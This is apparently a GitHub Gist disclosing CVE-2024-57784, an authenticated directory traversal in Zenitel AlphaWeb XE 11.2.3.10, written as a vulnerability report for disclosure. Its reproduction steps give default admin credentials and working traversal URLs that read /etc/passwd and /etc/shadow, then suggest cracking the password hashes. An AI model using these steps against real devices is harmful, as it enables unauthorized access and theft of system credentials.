Created
January 16, 2025 10:37
-
-
Save s4fv4n/8cc4e4cb6fd028e803898837b73aa342 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE ID: CVE-2024-57784 | |
| Vulnerability Title: Authenitcated Directory Traversal Vulnerability on Zenitel AlphaWeb XE - Version 11.2.3.10 | |
| Description: | |
| An issue in the component /php/script_uploads.php of Zenitel AlphaWebXE v11.2.3.10 allows attackers to execute a directory traversal. | |
| Vulnerability Type: | |
| Directory Traversal | |
| Vendor of Product: | |
| Zenitel | |
| Affected Product Code Base: | |
| Zenitel AlphaWeb XE - Version 11.2.3.10 | |
| Affected Component: | |
| Affected URL: http://<ip address>/php/script_uploads.php?action=get_file&file=../../../../etc/passwd | |
| Attack Type: | |
| Remote | |
| Impact Information Disclosure: | |
| true | |
| Attack Vectors: | |
| Steps to Reproduce: | |
| Step 1: Authenticate to the Zenitel AlphaWeb XE web application Version 11.2.3.10. (can use the default username 'admin' and password 'alphaadmin' for authentication). | |
| Step2 : After login to the Zenitel AlphaWeb XE web application, navigate to the URL "http://<ip address>/php/script_uploads.php?action=get_file&file=../../../../etc/passwd" and we will be able to successfully access the /etc/passwd file. | |
| Step 3: We can even access the /etc/shadow file which contains the local user password hashes by using the URL "http://<ip address>/php/script_uploads.php?action=get_file&file=../../../../etc/shadow". | |
| Step 4: Then we can try to crack these passwords to access the linux system. | |
| Reference: | |
| https://www.zenitel.com/ | |
| Discoverer: | |
| Safvan Parakkal from MoroHub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment